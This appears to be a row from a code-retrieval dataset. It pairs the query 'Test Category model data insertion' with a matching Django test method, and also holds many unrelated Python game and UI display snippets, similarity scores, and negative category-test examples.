'\n f'We are just going to pop by,\\nhelp him out, and be back in'\n f' time for tea at Space Florida!\" he continued \\nas he sauntered out the TARDIS.\\n')\n sleep(2)\n print(f'\"I thought we were going swimming at Poosh!\" {player[\"Name\"][0]} yelled as'\n f' they followed the DOCTOR out the door. \\nThe TARDIS doors slammed shut '\n f'behind {player[\"Name\"][0]}, and the unmistakable sound of the TARDIS \\n'\n f'dematerialising was heard. The DOCTOR and {player[\"Name\"][0]} could only stare'\n f' as the TARDIS disappeared from view.\\n')\n sleep(2)\n print(f'Before the DOCTOR could say anything, the two heard the unmistakable screams of \"EX-TER-MIN-ATE\" \\n'\n f'from down the hall. They quickly looked at each other, \"RUN!\"\\n')\n sleep(2)\n print(f'\"{player[\"Name\"][0]}, go find the TARDIS, she\\'ll protect you!\" the DOCTOR whispered quickly\\n'\n f'and ran off. \"DOCTOR! Wait!\" {player[\"Name\"][0]} angrily grumbled, \"Damn he runs fast.\"\\n'\n f'Hopefully they don\\'t run into any monster as they look for that blue police box.\\n')\n sleep(2)\n print(board[(0, 4)][\"Plot\"])", "def Draw(self):\n print ( 10*\"*\")\n print (\"Player \" + self.character + \" says:\")\n print (\"It's a Draw\")\n print ( 10*\"*\")", "def lobby_screen_pick_deck_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n # Pick deck text\n button_text_1 = Button('Pick an exist deck or create a new one: ','', (250,250,250),400, 100, 400, 35, font_color = (0,0,0), alpha = 150)\n button_text_1.update()\n button_text_1.draw(screen)\n\n # Deck list buttons\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n if len(f.readlines()) >= 12:\n pass\n else:\n button_new_deck = Button('+ New Deck','', (250,250,250),1020, 110, 120, 35, font_color = (0,0,0), alpha = 150)\n button_new_deck.update()\n button_new_deck.draw(screen)\n\n\n f.seek(0)\n x = len(f.readlines())\n y = 0\n deck_list_index = 0\n\n for i in range(1,7):\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) not in line:\n y += 1\n if y < x: # DECK_LIST_i exist\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n deck_length = len(make_card_list_from_string(line.replace('DECK_LIST_' + str(i) + ' = ', ''), ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2))\n # deck_length = int((len(line.replace('DECK_LIST_' + str(i) + ' = ', '')) -1)/14)\n if 'CHARACTER_' + str(i) in line:\n character_length = 1\n character_card = eval('card_' + line.replace('CHARACTER_' + str(i) + ' = ', '')[7:12])\n\n if user.deck_list_index == str(i):\n\n button_top = Button(character_card.name + ': ','', (100,30,130),85 + 180* (i-1), 165, 130, 60)\n button_top.update()\n button_top.draw(screen)\n\n if deck_length < 40:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (100,30,130),85 + 180* (i-1), 225, 130, 50, font_color = (250,0,0))\n button_bottom.update()\n button_bottom.draw(screen)\n else:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (100,30,130),85 + 180* (i-1), 225, 130, 50)\n button_bottom.update()\n button_bottom.draw(screen)\n\n else:\n\n button_top = Button(character_card.name + ': ','', (160,160,160),85 + 180* (i-1), 165, 130, 60, alpha = 240)\n button_top.update()\n button_top.draw(screen)\n\n if deck_length < 40:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (160,160,160),85 + 180* (i-1), 225, 130, 50, font_color 
= (200,0,0), alpha = 240)\n button_bottom.update()\n button_bottom.draw(screen)\n else:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (160,160,160),85 + 180* (i-1), 225, 130, 50, alpha = 240)\n button_bottom.update()\n button_bottom.draw(screen)\n\n y = 0\n\n else: # DECK_LIST_i not exist\n\n button = Button('Empty','', (200,200,200),85 + 180* (i-1), 165, 130, 110, alpha = 80)\n button.update()\n button.draw(screen)\n\n y = 0\n\n\n for i in range(1,7):\n if user.deck_list_index == str(i):\n button_edit = Button('Edit','', (50,50,170),85 + 180* (i-1), 282, 60, 30)\n button_edit.update()\n button_edit.draw(screen)\n\n button_delete = Button('Delete','', (160,30,30), 155 + 180* (i-1), 282, 60, 30)\n button_delete.update()\n button_delete.draw(screen)", "def battle_screen_my_hand_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n if screen_status.battle_screen_action_indicator != 'stage-0':\n # Page forward button\n button1 = Button('>','', (0,0,0),1100, 660, 50, 50)\n # Edge cases when len() = 14,28,42 ...\n if len(user.hand_list) % 7 == 0 and len(user.hand_list) != 0:\n if screen_status.battle_screen_my_hand_page_id != ((len(user.hand_list))//7): # Make sure on the last page no foreward button shows up\n button1.update()\n button1.draw(screen)\n # Normal cases\n else:\n if screen_status.battle_screen_my_hand_page_id != ((len(user.hand_list))//7 + 1): # Make sure on the last page no foreward button shows up\n button1.update()\n button1.draw(screen)\n # Page backward button\n button2 = Button('<', '' ,(0,0,0),50, 660, 50, 50)\n if screen_status.battle_screen_my_hand_page_id != 1: # Make sure on the first page no backward button shows up\n button2.update()\n button2.draw(screen)\n #\n if button_status.battle_screen_my_hand_page_change_button_backend:\n buttons.extend((button1,button2))\n button_status.battle_screen_my_hand_page_change_button_backend = False\n if ((screen_status.battle_screen_action_indicator == 'stage-1-level-up'\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'detail' in screen_status.battle_screen_action_indicator)\n or 'stage-2-other-action-detail-spawn' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-think-fast' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-equip' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-sneak' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-tactic-1' in screen_status.battle_screen_action_indicator)\n and (screen_status.battle_screen_player2_action_display_indicator == False)):\n if button_status.battle_screen_my_hand_indicator_display == True:\n located_card = user.hand_list[7*(screen_status.battle_screen_my_hand_page_id - 1)+(int(button_status.battle_screen_my_hand_indicator_position)-1)]\n\n button_top = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y - 5, 140, 5)\n button_top.update()\n button_top.draw(screen)\n\n button_bottom = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y + 180, 140, 5)\n button_bottom.update()\n button_bottom.draw(screen)\n\n button_left = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y, 5, 180)\n button_left.update()\n button_left.draw(screen)\n\n button_right = Button('','', (250,0,0),located_card.rect.x + 130, located_card.rect.y , 5, 180)\n button_right.update()\n button_right.draw(screen)\n # button_level_up = 
Button('***','battle_screen_handaction_****', (70,70,150),located_card.rect.x+10, located_card.rect.y - 27, 115, 27)\n # button_level_up.update()\n # button_level_up.draw(screen)", "def show_greeting(self):\n self.output(' ------------------------ ')\n self.output('You are now playing ' + self.name)\n self.output(self.greeting)\n self.output(' ------------------------ ')", "def lobby_screen_room_detail_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n\n if button_status.lobby_screen_room_detail_display == 'none':\n\n if button_status.lobby_screen_room_list_display == 'N/A':\n button5 = Button('Create a game:','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n button3 = Button('CREATE','', (40,40,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n else:\n button5 = Button('Please join the existing game!','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n\n\n elif button_status.lobby_screen_room_detail_display == 'my':\n\n if button_status.lobby_screen_room_status == '1/2':\n button5 = Button(user.name + \"'s game:\" + ' 1/2','', (0,0,0),400, 580, 400, 50, font_size = 20,font_color = (200,100,100), alpha = 0)\n button5.update()\n button5.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button5 = Button(user.name + \"'s game:\" + ' 2/2','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n if button_status.lobby_screen_my_ready_to_go == False:\n button3 = Button(user.name,'', (200,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_my_ready_to_go == True:\n button3 = Button(user.name,'', (110,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('Empty','', (250,250,250),205, 680, 650, 35,alpha = 100)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button(player2.name,'', (200,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button(player2.name,'', (110,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_prepare_to_go_display == False:\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('NEXT','', (120,120,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button3 = Button('NEXT','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n else:\n if button_status.lobby_screen_my_ready_to_go == False:\n\n button3 = Button('READY!','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n elif button_status.lobby_screen_my_ready_to_go == True:\n if button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button('PLAY!','', (247, 201, 37),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button('WAIT!','', (40, 40, 120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n\n button3 
= Button('QUIT','', (120,40,40),920, 684, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n elif button_status.lobby_screen_room_detail_display == 'other':\n\n if button_status.lobby_screen_room_status == '1/2':\n button5 = Button(player2.name + \"'s game:\" + ' 1/2','', (0,0,0),400, 580, 400, 50, font_size = 20,font_color = (200,100,100), alpha = 0)\n button5.update()\n button5.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button5 = Button(player2.name + \"'s game:\" + ' 2/2','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n if button_status.lobby_screen_my_ready_to_go == False:\n button3 = Button(player2.name,'', (200,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_my_ready_to_go == True:\n button3 = Button(player2.name,'', (110,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('Empty','', (250,250,250),205, 680, 650, 35,alpha = 100)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button(user.name,'', (200,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button(user.name,'', (110,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_prepare_to_go_display == True:\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button('READY!','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button('WAIT...','', (40,40,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n button3 = Button('QUIT','', (120,40,40),920, 684, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)", "def battle_screen_battleground_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n if ('stage-2-other-action-detail-tactic-1' in screen_status.battle_screen_action_indicator\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and '-detail-tactic-1' in screen_status.battle_screen_action_indicator)\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'easy-shot' in screen_status.battle_screen_action_indicator)\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'tricky-shot' in screen_status.battle_screen_action_indicator)\n or 'stage-3-monster-' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-easy-shot' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-tricky-shot' in screen_status.battle_screen_action_indicator\n ):\n if button_status.battle_screen_player1_battleground_indicator_display == True:\n if int(button_status.battle_screen_player1_battleground_indicator_position) <= 3:\n i = int(button_status.battle_screen_player1_battleground_indicator_position)\n monster_rect_x = 650\n monster_rect_y = 220 + 110*(i-1)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n elif 
int(button_status.battle_screen_player1_battleground_indicator_position) <= 6:\n i = int(button_status.battle_screen_player1_battleground_indicator_position)\n monster_rect_x = 825\n monster_rect_y = 220 + 110*(i-4)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n\n if button_status.battle_screen_player2_battleground_indicator_display == True:\n if int(button_status.battle_screen_player2_battleground_indicator_position) <= 3:\n i = int(button_status.battle_screen_player2_battleground_indicator_position)\n monster_rect_x = 420\n monster_rect_y = 220 + 110*(i-1)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n elif int(button_status.battle_screen_player2_battleground_indicator_position) <= 6:\n i = int(button_status.battle_screen_player2_battleground_indicator_position)\n monster_rect_x = 245\n monster_rect_y = 220 + 110*(i-4)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)", "def display_hangman(self):\n print(Fore.CYAN + HANGMAN_PICS[self.stage])\n print('\\n')\n print(self.progress + Style.RESET_ALL)\n print('\\n')", "def info(msg):\n click.secho(msg, fg='blue')", "def print(self):\n for i in range(self.rows):\n print(\"--\" * self.cols + \"-\")\n for j in range(self.cols):\n cell = self.get_game_cell(i, j)\n if cell is None:\n print(f'({i} - {j}): failed')\n return None\n if cell.status == 'EMPTY':\n print(\"| \", end=\"\")\n else:\n print(f\"|{cell.status}\", end=\"\")\n print(\"|\")\n print(\"--\" * self.cols + \"-\")\n print(f\"Completed({self.completed}) - {self.winner}\")", "def is_button_output_present(self):\n self.wait_for_element_presence('div#ready', 'Page is Ready')\n self.q(css='div#fixture button').first.click()\n self.wait_for_element_presence('div#output', 'Button Output is Available')", "def show_messages(self):\n console.alert(\n \"Info\",\n \"If StaSh does not launch anymore after you changed the config, run the 'launch_stash.py' script with \\n'--no-cfgfile'.\",\n \"Ok\",\n hide_cancel_button=True,\n )\n while True:\n self.wait_modal()\n if not self.subview_open:\n break\n console.alert(\n \"Info\",\n \"Some changes may only be visible after restarting StaSh and/or Pythonista.\",\n \"Ok\",\n hide_cancel_button=True,\n )", "def main():\r\n future_student = \"Future begins\"\r\n print_message(future_student)\r\n print_message(\"Dreams begin\")\r\n print_message(\"Aspirations begin\")", "def print_banner(message):\n\n print(\"#############################################################################\")\n print(message)", "def show_result():\n print(\"I win!!\")", "def on_pushButton_clicked(self):\r\n # TODO: not implemented yet\r\n print 1", "def print_hands(self):\n # Clear the terminal and reprint round header\n os.system(\"clear\")\n self.print_header\n\n # Only display one of the dealers cards if they are still playing\n if not self.round_winner:\n print()\n print(\"Dealer's Cards\")\n print(\"=\" * 25)\n print(\"UNKNOWN\")\n for card in self.dealer.cards:\n if card != self.dealer.cards[0]:\n print(f\"{card.game_value} of {card.suit}\")\n print(\"-\"*25)\n print(\"TOTAL = ?\")\n print()\n\n print(\"Player's Cards\")\n print(\"=\" * 25)\n for card in self.player.cards:\n print(f\"{card.game_value} of {card.suit}\")\n print(\"-\" * 25)\n print(\"TOTAL = \" + str(self.player.sum_cards()))\n print()\n\n # Display the players 
cards and all of the dealers cards\n elif self.round_winner:\n print()\n print(\"Dealer's Cards\")\n print(\"=\" * 25)\n for card in self.dealer.cards:\n print(f\"{card.game_value} of {card.suit}\")\n print(\"-\" * 25)\n print(\"TOTAL = \" + str(self.dealer.sum_cards()))\n print()\n\n print(\"Player's Cards\")\n print(\"=\" * 25)\n for card in self.player.cards:\n print(f\"{card.game_value} of {card.suit}\")\n print(\"-\" * 25)\n print(\"TOTAL = \" + str(self.player.sum_cards()))\n print()\n pass", "def player_tie(self):\r\n\r\n self.summary = (\" \"* 78) + \"TIE. TRY AGAIN\"\r\n print(\"Match ends in a draw.\\n\")", "def continue_command(self):\n cycles_cont = self.on_spin_cont(wx.SpinCtrl)\n global global_cycles_completed\n # check that this function has been called on pressing continue button\n text = \"\".join(\n [_(u\"continue_command function has been called, number of cycles is: \"), str(cycles_cont)])\n if self.state == 0:\n self.canvas_2d.render(text, True)\n else:\n self.canvas_3d.render()\n if cycles_cont is not None: # if the number of cycles provided is valid\n if global_cycles_completed == 0:\n print(_(u\"Error! Nothing to continue. Run first.\"))\n elif self.run_network(cycles_cont):\n global_cycles_completed += cycles_cont\n print(\" \".join([_(u\"Continuing for\"), str(cycles_cont), _(u\"cycles.\"), _(u\"Total:\"), str(\n global_cycles_completed)]))", "def inform_players(list_of_players):\n for player in list_of_players:\n player.show_cards_beginning()\n input(\"Press enter to pass your turn\")\n print()", "def principle(self):\n self.main_window.message(\n bg=\"navy\", fg=\"ivory\", width=400, font=\"Helvetica 10 bold\",\n text=\"The pieces in this game each have one white and one black\"\n \" side. When you click on a piece, all 8 adjacent pieces turn\"\n \" over.\\nThe game consists of trying to turn them all over.\\n\"\n \"\\nIf the exercise is very easy with a 2 x 2 grid, it becomes\"\n \" more difficult with larger grids. It is even impossible with\"\n \" some grids.\\nIt's up to you to find out which ones!\\n\"\n \" Reference: 'Pour la Science' magazine\")", "def display_turn_text(self):\n if self.turn_display_timer > 0:\n self.turn_display_timer -= 1\n if self.turn_display_timer > 0:\n fill(1, 0, 0)\n textSize(self.WINDOW_SIZE//20)\n textAlign(CENTER)\n if self.player_turn is True:\n game_turn_text = \"Player Turn\"\n text(game_turn_text, self.WINDOW_SIZE/2, self.TEXT_OFFSET)\n elif self.player_turn is False:\n game_turn_text = \"OthelloAI Turn\"\n text(game_turn_text, self.WINDOW_SIZE/2, self.TEXT_OFFSET)", "def print_instructions(self):\n\t\tprint('\\n\\n==========================================================================')\n\t\tprint('==========================================================================\\n')\n\t\tprint('Welcome to Tic Tac Toe, the came you know and love. \\nThe rules are the same ones you know and love. \\nTo make a move just type the coordinates of the spot like so - row,column. \\nNo spaces please! Lets go ahead and start! 
Here is a picuter of the board with some coordinates just in case!\\n')\n\t\tprint('=====================')\n\t\tprint('|| 0,0 | 0,1 | 0,2 ||')\n\t\tprint(' -----------------')\n\t\tprint('|| 1,0 | 1,1 | 1,2 ||')\n\t\tprint(' -----------------')\n\t\tprint('|| 2,0 | 2,1 | 2,2 ||')\n\t\tprint('=====================')\n\t\tprint('\\n==========================================================================')\n\t\tprint('==========================================================================\\n\\n')", "def wait_for_button(self, button, message=True):\n if message:\n rospy.loginfo(\"Waiting for xbox button: \" + button)\n \n wait_for(lambda: not self.get_button(button) == 0)", "def print_fight_status():\n printmessage(\"You're fighting with a %s\" % ITEMS[0], 3, RED, 0)\n printmessage(\"You feel like you're %s\" % get_strength_text(STRENGTHVAL), 4, GREEN, 0)\n printmessage(\"The bear looks like he is %s\" % get_strength_text(BEARSTRENGTHVAL), 5, MAGENTA, 0)\n printmessage(\"Your food supply is %s\" % get_hunger_text(HUNGERVAL), 6, YELLOW, 0)", "def event_m20_11_x81():\n \"\"\"State 0,1: Prayer action\"\"\"\n PlayerActionRequest(6)\n assert (GetStateTime() > 4) != 0\n \"\"\"State 2: Dialog display: Nothing happened\"\"\"\n # action:1113:\"Alas, nothing happened\"\n DisplayOwnOkMenu(1113, 10, 0, 190, 0, 0, 0)\n \"\"\"State 3: End of prayer action\"\"\"\n EndPlayerActionRequest()\n \"\"\"State 4: End state\"\"\"\n return 0", "def play(self):\n print(\"Bientôt ! :)\")", "def printInstructions(self):\n print(\"\"\"•\tAim of the Game is to be the first to lose all of your chips\n•\tPlayers are put in order of the lowest to \nhighest based on their first roll\n(This is done automatically when you enter your name)\n• You start out with 5 chips.\n• When it is your turn you roll the die.\n\\t•\tIf the space with the same number as the die is empty (value of 0),\n\\t\\tput a chip there.\n\\t•\tbut if there already is a chip there (value of 1), you must take it.\n\\t•\tIf you roll a 6, you always put one of your chips on the space number 6 – \n\\t\\tregardless of how many chips are there already. 
\n\\t\\tChips on space number 6 are out of the game,\n\\t\\tand you never pick these up again.\n\"\"\")", "def printStep(self):\n\n\t\tprint '\\nConfiguracao da fita: ',\n\n\t\tcount = 0\n\t\twhile count < len(self.tape):\n\t\t\tif count == self.currentPos:\n\t\t\t\tprint '_',\n\n\t\t\tprint self.tape[count],\n\t\t\tcount += 1\n\n\t\tprint '\\nEstado atual: ', self.currentState", "def print_success_msg(msg):\n click.secho(msg, fg='green', file=sys.stdout)", "def outro():\n print('Tento remake vytvoril mirek sko súčasť svojich školení v rokoch 2022-2023.')\n print('Originálnu hru vytvoril v roku 1986 František Fuka aka Fuxoft.')\n print('See you soon.')", "def test_ProstateReporting1(self):\n\n self.delayDisplay(\"Starting the test\")\n\n self.delayDisplay('Test passed!')", "def build_deck_screen_stable_button_display(screen, buttons,screen_status,button_status):\n # button1 = Button('Back','build_deck_screen', (0,0,0),0, 0, 50, 50)\n # button1.update()\n # button1.draw(screen)\n button2 = Button('Save','build_deck_screen', (250,250,250),1150, 0, 50, 50, font_color = (0,0,0), alpha = 150)\n button2.update()\n button2.draw(screen)\n button3 = Button('Build your deck by picking 40 cards below: ', 'build_deck_screen', (250,250,250),300, 0, 600, 50, font_color = (0,0,0), alpha = 150)\n button3.update()\n button3.draw(screen)\n if button_status.build_deck_screen_stable_button_backend:\n buttons.extend((button2, button3))\n button_status.build_deck_screen_stable_button_backend = False", "def printStatus(self,mod=\"\"):\n dims = \"\"\n corner_labels = {\"back_right\":\"br\",\"back_left\":\"bl\",\"front_right\":\"fr\",\\\n \"front_left\":\"fl\"}\n for x in self.four_corners:\n dims += \"{}({},{}), \".format(corner_labels[x],self.four_corners[x][0],\\\n self.four_corners[x][1])\n print(\"{}{}\\tLEN: {}\\tLANES: ({},{})\".format(mod,\\\n self.label,round(self.length,2), self.top_up_lane.label,\\\n self.bottom_down_lane.label))\n print(\"{}{}\\t{}\\n\".format(mod,self.label,dims))", "def check_ready(self):\r\n print \"Checking ready\"\r\n\t\tif self.game.trough.is_full():\r\n print \"Ready\"\r\n\t\t\tself.ready()\r\n\t\t\treturn True\r\n\t\tprint \"Not Ready\"\r\n\t\treturn False", "def prompt_player(self):\n board = self.draw_board()\n print board\n self.player_moves(self.board_values)", "async def print_processor(self) -> None:\n try:\n while True:\n while self.print_queue.empty() is not True:\n stub = await self.print_queue.get()\n if isinstance(stub, str):\n print(stub)\n elif isinstance(stub, tuple):\n if stub[0] == \"error\":\n print(f\"{r}{stub[1]}{reset}\")\n elif stub[0] == \"warning\":\n print(f\"{y}{stub[1]}{reset}\")\n elif stub[0] == \"success\":\n print(f\"{g}{stub[1]}{reset}\")\n elif stub[0] == \"bold\":\n print(f\"{bold}{stub[1]}{reset}\")\n else:\n print(f\"{stub[1]}\")\n self.print_queue.task_done()\n await asyncio.sleep(0.002)\n except asyncio.CancelledError:\n print('Closing the RedCisco application... Cleaning up running tasks...\\n')" ]
[ "0.66662335", "0.6361344", "0.6316823", "0.6280809", "0.6178084", "0.6174785", "0.6170106", "0.613654", "0.61161566", "0.61064357", "0.6105633", "0.60992396", "0.6090242", "0.6024819", "0.6020871", "0.5997386", "0.5983832", "0.59802616", "0.59356964", "0.593354", "0.5915386", "0.59087473", "0.5908093", "0.590475", "0.5900574", "0.5892236", "0.5884856", "0.5874889", "0.5851253", "0.58500266", "0.5832663", "0.5821517", "0.5811647", "0.581077", "0.5810268", "0.58044815", "0.57990724", "0.57977", "0.5795472", "0.5790314", "0.5785214", "0.57846177", "0.5779526", "0.5777746", "0.5769675", "0.5768167", "0.5759663", "0.5749025", "0.57438606", "0.5732037", "0.5729812", "0.57221663", "0.5719263", "0.5713208", "0.57118225", "0.57047015", "0.5704197", "0.5698363", "0.56949097", "0.5688422", "0.5685752", "0.56842947", "0.56740266", "0.56683314", "0.56671965", "0.5665152", "0.5660065", "0.5656915", "0.5655009", "0.5653172", "0.56428057", "0.56407994", "0.5640728", "0.5640647", "0.56373674", "0.56320965", "0.5622394", "0.56119156", "0.56043094", "0.5596326", "0.5596032", "0.55957234", "0.5595171", "0.55939806", "0.5591642", "0.5587074", "0.5577026", "0.55759186", "0.5575224", "0.55707306", "0.5568193", "0.5565455", "0.55647534", "0.5563202", "0.55618787", "0.5561455", "0.55533564", "0.55525935", "0.5552032", "0.5549953", "0.5547615" ]
0.0
-1
Test Category model data insertion/types/field attributes
def test_category_model_entry(self):  # PRUEBA DE CARGAR LA INFORMACION EN LOS MODELOS A TESTEAR
    data = self.data1
    self.assertTrue(isinstance(data, Category))  # REALIZA EL TESTEO
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_category_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data, Category))\n self.assertEqual(str(data), 'django')", "def test_create_category(self):\n pass", "def test_category_has_access_to_model_data():\n category = Category()\n category_data = category.get_category_data()\n\n assert type(category_data) is list\n assert len(category_data) > 1", "def test_category_model_entry(self):\n data = self.data1\n self.assertEqual(str(data), 'django')", "def test_update_category(self):\n pass", "def test_new_category_data(db_session):\n new_cat = Category(\n label=\"test_label\",\n desc=\"test_desc\"\n )\n db_session.add(new_cat)\n category = db_session.query(Category).all()\n assert category[0].label == \"test_label\"\n assert category[0].desc == \"test_desc\"", "def test_save(self, init_db):\n params = {\n 'name': fake.alphanumeric(15)\n }\n category = Category(**params)\n assert category == category.save()", "def test_create_category(self):\n payload = {\n 'name': 'Houses',\n }\n res = self.client.post(CATEGORY_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n category = Category.objects.get(id=res.data['id'])\n serializer = CategorySerializer(category)\n self.assertEqual(serializer.data['name'], payload['name'])", "def test_category_save(database):\n category = Category(title=\"Test Category\")\n category.save()\n\n assert category.title == \"Test Category\"", "def test_create(self):\n self.assertTrue(Category.objects.exists())", "def test_create_cat_object():\n from .scripts.initializedb import create_cat_object\n cat_object = create_cat_object(\"a\", \"b\", \"c\", \"c\")\n assert isinstance(cat_object, Category)", "def test_model_string_representation(self, init_db, category):\n assert repr(category) == f'<Category: {category.name}>'", "def test_add_category(self):\n self.add_success(self.test_data['pants'])", "def test_add_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n rv = self.category('Breakfast')\n self.assertIn(b'Category created', rv.data)", "def test_create_recipe_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('JunkFood')\n self.dashboard()\n self.recipe_dashboard()\n rv = self.create_recipe('cakes', 'blah, blah, blah....mix ingredient, heat')\n self.assertIn(b'Recipe created', rv.data)", "def test_create_category(self):\n res = self.client().post('/categories/', data=self.category)\n self.assertEqual(res.status_code, 201)\n self.assertIn('Stews', str(res.data))", "def test_add_category_missing_fields(self):\n category = json.dumps({\n 'desc': \"Jamaican\",\n })\n response = self.client.post('/category', data=category,\n headers={\"Authorization\": self.token})\n self.assertEqual(response.status_code, 400)\n self.assertIn('Check the keys and try again', response.data.decode())", "def test_edit_recipe_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('JunkFood')\n self.dashboard()\n self.recipe_dashboard()\n self.create_recipe('cakes', 'blah, blah, blah....mix ingredient, heat')\n rv = self.edit_recipe('edited cakes', 'edited blah blah blah spoon , heat')\n self.assertIn(b'Recipe successfully updated', rv.data)", "def test_category_lowercase(self):\n 
self.assertEqual(self.category.category, \"test\")", "def test_update(self, init_db, category):\n category_name = fake.alphanumeric()\n category.update(name=category_name)\n assert category.name == category_name", "def test_category_mixed(self):\n self.go200('minus_upload')\n self.formfile('minus_upload', 'file', AUDIO_FILE)\n self.fv('minus_upload', 'categories', 'onecat')\n self.fv('minus_upload', 'add_category', 'yuppie')\n self.submit200()\n minus = MinusRecord.objects.all()[0]\n self.assert_equal(minus.categories.count(), 2)\n self.assert_equal(minus.categories.all()[0].name, 'onecat')\n self.assert_equal(minus.categories.all()[1].name, 'yuppie')", "def insert_data_category_into_bdd(self):\n for category in constant.LIST_CATEGORIES:\n data = Category(name=category)\n data.save()\n print(\"the category \" + str(category) + \" has been created\")", "def test_dashboard_recipe_created_with_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('JunkFood')\n self.dashboard()\n rv = self.recipe_dashboard()\n self.assertIn(b'JunkFood', rv.data)", "def test_get(self, init_db, category):\n assert Category.get(category.id) == category", "def test_edit_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n 